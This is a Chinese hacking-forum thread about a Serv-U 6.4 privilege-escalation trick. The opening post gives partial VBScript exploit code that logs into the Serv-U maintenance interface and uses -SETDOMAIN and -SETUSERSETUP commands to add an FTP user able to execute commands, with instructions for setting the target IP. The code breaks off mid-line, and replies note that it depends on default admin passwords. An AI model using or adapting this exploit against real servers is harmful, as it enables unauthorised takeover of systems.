[讨论]最近传闻的 SERV-U 6.4提权方法 通杀SERV-U版本
信息来源:邪恶八进制信息安全团队([url]www.eviloctal.com[/url])议题作者:csfs
[quote][b]SERV-U 6.4提权方法 通杀SERV-U版本[/b]
修改ftpport为21
修改newdomain后面的goldsun| IP(为要提权的服务器的IP地址)|
修改newuser后面的 -IP=IP地址和上面一样(为要提权的服务器的IP地址)...OK.....提权...会用FTP增加一个可以
执行命令的用户.....有个这个用户什么不能做哈.....
ftpport = 65500
timeout=3
loginuser = "User " & user & vbCrLf
loginpass = "Pass " & pass & vbCrLf
deldomain = "-DeleteDOMAIN" & vbCrLf & "-IP=0.0.0.0" & vbCrLf & " PortNo=" & ftpport & vbCrLf
mt = "SITE MAINTENANCE" & vbCrLf
newdomain = "-SETDOMAIN" & vbCrLf & "-Domain=goldsun|0.0.0.0|" & ftpport & "|-1|1|0" & vbCrLf & "-TZOEnable=0" & vbCrLf & " TZOKey=" & vbCrLf
newuser = "-SETUSERSETUP" & vbCrLf & "-IP=0.0.0.0" & vbCrLf & "-PortNo=" & ftpport & vbCrLf & "-User=go" & vbCrLf & "-Password=od" & vbCrLf & _[/quote]
最近网上出了新提权法.
我不怎么明白?有谁成功了,最好做个动画看看!~ 密码改了还是没有什么用的,这个方法只能针对密码没有改的6.4版本,当然,以前的版本也可以这样搞. 1.serv-u永远是好东西
2.lz代码都有了自己试验下不就行还看什么动画 [s:263] 这方面的文章太多了 ,你baidu下,serv~u的本地提权都是基于默认密码的,改了密码就不用想了,但在5.0版本有个远程提权,但必须你有个ftp帐户。 这东西有用吗?我杂试了不成功?能否具体说说
页:
[1]